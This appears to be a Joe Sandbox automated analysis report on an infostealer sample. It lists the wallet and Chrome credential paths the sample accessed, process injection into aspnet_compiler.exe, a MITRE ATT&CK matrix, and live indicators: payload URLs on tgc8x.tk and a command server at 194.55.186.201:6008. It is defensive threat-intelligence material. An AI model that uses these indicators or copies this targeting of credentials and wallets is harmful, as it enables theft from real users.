\ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Il5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: Yara matchFile source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.StZAEFSb2j.exe.42f9000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: StZAEFSb2j.exe PID: 780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 1592, type: MEMORYSTR
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 221 Windows Management Instrumentation | Path Interception | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 33 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 12 Process Discovery | Remote Desktop Protocol | 3 Data from Local System | Exfiltration Over Bluetooth | 11 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 251 Virtualization/Sandbox Evasion | Security Account Manager | 251 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Non-Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | 14 Application Layer Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Software Packing | Cached Domain Credentials | 123 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Source | Detection | Scanner | Label | Link
StZAEFSb2j.exe | 34% | ReversingLabs | ByteCode-MSIL.Infostealer.Generic |
StZAEFSb2j.exe | 26% | Virustotal | | Browse
StZAEFSb2j.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link | Download
1.0.aspnet_compiler.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1234943 | | Download File
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://tempuri.org/Endpoint/CheckConnectResponse | 0% | URL Reputation | safe |
http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/EnvironmentSettings | 0% | URL Reputation | safe |
http://tempuri.org/t_ | 0% | URL Reputation | safe |
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | 0% | URL Reputation | safe |
http://tempuri.org/ | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/CheckConnect | 0% | URL Reputation | safe |
http://ns.adobe.c/g | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/VerifyUpdateResponse | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/SetEnviron | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/SetEnvironment | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/SetEnvironmentResponse | 0% | URL Reputation | safe |
http://tgc8x.tk | 0% | Avira URL Cloud | safe |
http://tempuri.org/Endpoint/GetUpdates | 0% | URL Reputation | safe |
https://api.ipify.orgcookies//settinString.Removeg | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/GetUpdatesResponse | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/EnvironmentSettingsResponse | 0% | URL Reputation | safe |
http://tempuri.org/Endpoint/VerifyUpdate | 0% | URL Reputation | safe |
https://tgc8x.tk/tt/BLACKDEV.txt | 100% | Avira URL Cloud | phishing |
https://tgc8x.tk4 | 0% | Avira URL Cloud | safe |
http://tempuri.org/0 | 0% | URL Reputation | safe |
https://tgc8x.tkD8 | 0% | Avira URL Cloud | safe |
http://194.55.186.201:6008 | 0% | Avira URL Cloud | safe |
194.55.186.201:6008 | 0% | Avira URL Cloud | safe |
http://194.55.186.201: | 0% | Avira URL Cloud | safe |
https://tgc8x.tk/tt/lamb.txt | 100% | Avira URL Cloud | phishing |
https://tgc8x.tk | 0% | Avira URL Cloud | safe |
http://194.55.186.201:6008/ | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tgc8x.tk | 50.115.174.192 | true | true | | unknown
api.ip.sb | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://tgc8x.tk/tt/BLACKDEV.txt | true | Avira URL Cloud: phishing | unknown
194.55.186.201:6008 | true | Avira URL Cloud: safe | unknown
https://tgc8x.tk/tt/lamb.txt | true | Avira URL Cloud: phishing | unknown
http://194.55.186.201:6008/ | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ipinfo.io/ip%appdata% | StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr | false | | high
https://duckduckgo.com/ac/?q= | tmpE2D.tmp.1.dr | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Endpoint/CheckConnectResponse | aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.datacontract.org/2004/07/ | aspnet_compiler.exe, 00000001.00000002.416441450.000000000309B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/EnvironmentSettings | aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/t_ | aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE% | StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/envelope/ | aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://search.yahoo.com?fr=crmas_sfpf | aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tmpE2D.tmp.1.dr | false | | high
http://schemas.xmlsoap.org/soap/envelope/D | aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/ | aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Endpoint/CheckConnect | aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.dr | false | | high
http://ns.adobe.c/g | aspnet_compiler.exe, 00000001.00000003.412663066.0000000008CB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412625368.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412575103.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.402236725.0000000008CA1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412702825.000000000152D000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://tgc8x.tk4 | StZAEFSb2j.exe, 00000000.00000002.320562361.0000000002B54000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse | aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                            http://tempuri.org/Endpoint/SetEnvironaspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.drfalse
                                              high
                                              http://tempuri.org/Endpoint/SetEnvironmentaspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://tempuri.org/Endpoint/SetEnvironmentResponseaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://tgc8x.tkStZAEFSb2j.exe, 00000000.00000002.320604810.0000000002B5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://tgc8x.tkD8StZAEFSb2j.exe, 00000000.00000002.321171028.0000000002BC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://194.55.186.201:6008aspnet_compiler.exe, 00000001.00000002.415787658.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://tempuri.org/Endpoint/GetUpdatesaspnet_compiler.exe, 00000001.00000002.415787658.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.415687042.0000000002FDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://ac.ecosia.org/autocomplete?q=tmpE2D.tmp.1.drfalse
                                                high
                                                https://search.yahoo.com?fr=crmas_sfpaspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.drfalse
                                                  high
                                                  https://api.ipify.orgcookies//settinString.RemovegStZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2004/08/addressingaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://194.55.186.201:aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://tempuri.org/Endpoint/GetUpdatesResponseaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://tempuri.org/Endpoint/EnvironmentSettingsResponseaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://tempuri.org/Endpoint/VerifyUpdateaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://tempuri.org/0aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://tgc8x.tkStZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameStZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpE2D.tmp.1.drfalse
                                                          high
                                                          http://schemas.xmlsoap.org/soap/actor/nextaspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
50.115.174.192 | tgc8x.tk | United States | 32875 | VIRPUS | true
194.55.186.201 | unknown | Germany | 39855 | MOD-EUNL | true
                                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                                            Analysis ID:736967
                                                            Start date and time:2022-11-03 12:43:40 +01:00
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 8m 27s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:StZAEFSb2j.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:5
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@4/26@3/2
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HDC Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Stop behavior analysis, all processes terminated
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
                                                            • TCP Packets have been reduced to 100
                                                            • Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31
                                                            • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net
• Not all processes were analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
12:44:40 | API Interceptor | 1x Sleep call for process: StZAEFSb2j.exe modified
12:45:08 | API Interceptor | 74x Sleep call for process: aspnet_compiler.exe modified
                                                            Process:C:\Users\user\Desktop\StZAEFSb2j.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):847
                                                            Entropy (8bit):5.35816127824051
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
                                                            MD5:31E089E21A2AEB18A2A23D3E61EB2167
                                                            SHA1:E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
                                                            SHA-256:2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
                                                            SHA-512:A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2412
                                                            Entropy (8bit):5.341108361394489
                                                            Encrypted:false
                                                            SSDEEP:48:MOfHK5HKXAHKdHKBSTHaAHKzvRYHKhQnoPtHoxHImHKhBHKoHaHZHAHjHKoLHG1V:vq5qXAqdqslqzJYqhQnoPtIxHbqLqo67
                                                            MD5:5D4B4A6BFACB854E7F2C4ADB625D1F71
                                                            SHA1:FC542A0C19178B77638600EA36378BA3F64BC677
                                                            SHA-256:170BA6EFCB3905EA4870D3771B9F38F64D079F8E3871032023B5EB6CAEF618B0
                                                            SHA-512:BBC9AA745C2F44B5572EFA2B15FA45494E786F69339FC9ED8C52AAF7DA8AB3D48C24EF4106850892B9A711BA968DE71F11321CD1CAFE2F745A9CA7BAE4F197EC
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.687055908915499
                                                            Encrypted:false
                                                            SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                            MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                            SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                            SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                            SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                            Malicious:false
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.697125102277996
                                                            Encrypted:false
                                                            SSDEEP:24:uVOXLU7xwK58ZsokCVVZGi4eW0ZFJVPNR+x:c7xR8mwGi4sbv+x
                                                            MD5:207485EFCE70435971C31586A1E4CF97
                                                            SHA1:245A410AEB767B099944A8E81F75FC9A4B270DFB
                                                            SHA-256:BF45E8FD687DC0E63FD40F32F2279152430579EDE044C3BB0852A1AC460D4B09
                                                            SHA-512:A7F01CBBAFE9EA12B4C820F5E1A107D4C6FBD57CFF41C4AC679485F2B7DAFA4E9148AF830A39A083EC866E988A8E279FEB39D5EB58593E75D22253BED4DEFA19
                                                            Malicious:false
                                                            Preview:QCOILOQIKCUYMAHQLCLSCUGPPLVTJEARXPXBWFLOFHRVUSXLZVWHDQNKEMGPPQAGBLIPFAECDZNKKHITNQJASUXZAYMZIQCEHAQMCVZBMFUDBNQEKCBNCGMUWXDJLMJKVRKYBLRGNWGBGEVIGVROENGUXKJERNJSJJEMVLDKUXDFUWUPQNWUYRIEPUFOQKPDSZXXCKNQVBEAVMDMBRZSWYPCNALGHTDFWFNDXKSHXCRLYPVFVYVEOFRHUFZZGNIXSJQCPZGONOYWWUQLBEBGALPOGZBXJUYXTHWOKWNKJYPSELALXQYIKAHXCELBTKSQFTNYWBHRPQFULPLOCWEQAXEQNXOBIQOYFSEEZWHQQLZPBQOUMVZIMRWRLSPDKEBXSTPZLAGVYIORHCDBXTBHYOFKACXVGKKSIFHPOLDOQGIDQPFPVIPGUCGUCQLFFBYAGFJYFOMBUMPAHPQLDOHYAMKEGSDPXEYBQJUOWZOPFYRTLYUYDJHPLVEXBXUGVUEYIBUTUABUIHROFHZMLJUXWGZILWRHVKGOSZXXCIWGRGUZQDKQMTXRRWHDLJPPIRDALEIAYYTEEONIAELEISEOGNTDSALVOZDMFPLJSJMKJYMWGSKCTXHTLYYFJSXNZMDELRTJBNXSGAOEPKCPEEPFZKCAATOWHUWGQAEQNZHTKQEUCFRXVJWOGAEQDIWARNNFKCHEDRWTKEOVTURBKPDMQPPDCJGTYCTIRELHGRIRLWAPLCEHANSMGDZZYCXXDOTQVOSDZJAEBOTEVLSMHXCOWDPVQPSGDIDBAWUTDPIYPVBFSUMFBUYOPRXLECFHENURLSLKGPFWXDUFYOAKNTFKOYFUZEKLRZOLPYKMCKVZOIMDCCSGPQNCQXJOTJDKUQEPVHFKRSGZYJBNUHVTOEMNLTDXGZHTDQFQZCOULTNVZRAVLOIOVIKUTWPYLRJUCUDMYVYFWSBLJTJKMSJEIJXWYNPKGTYLKDAEVBUQUIJX
                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1026
                                                            Entropy (8bit):4.697427014915338
                                                            Encrypted:false
                                                            SSDEEP:24:J87vGcgdreYqco0NFLg5eIatTFj9qVUq2Z:J83gAYq8NFRtx7Z
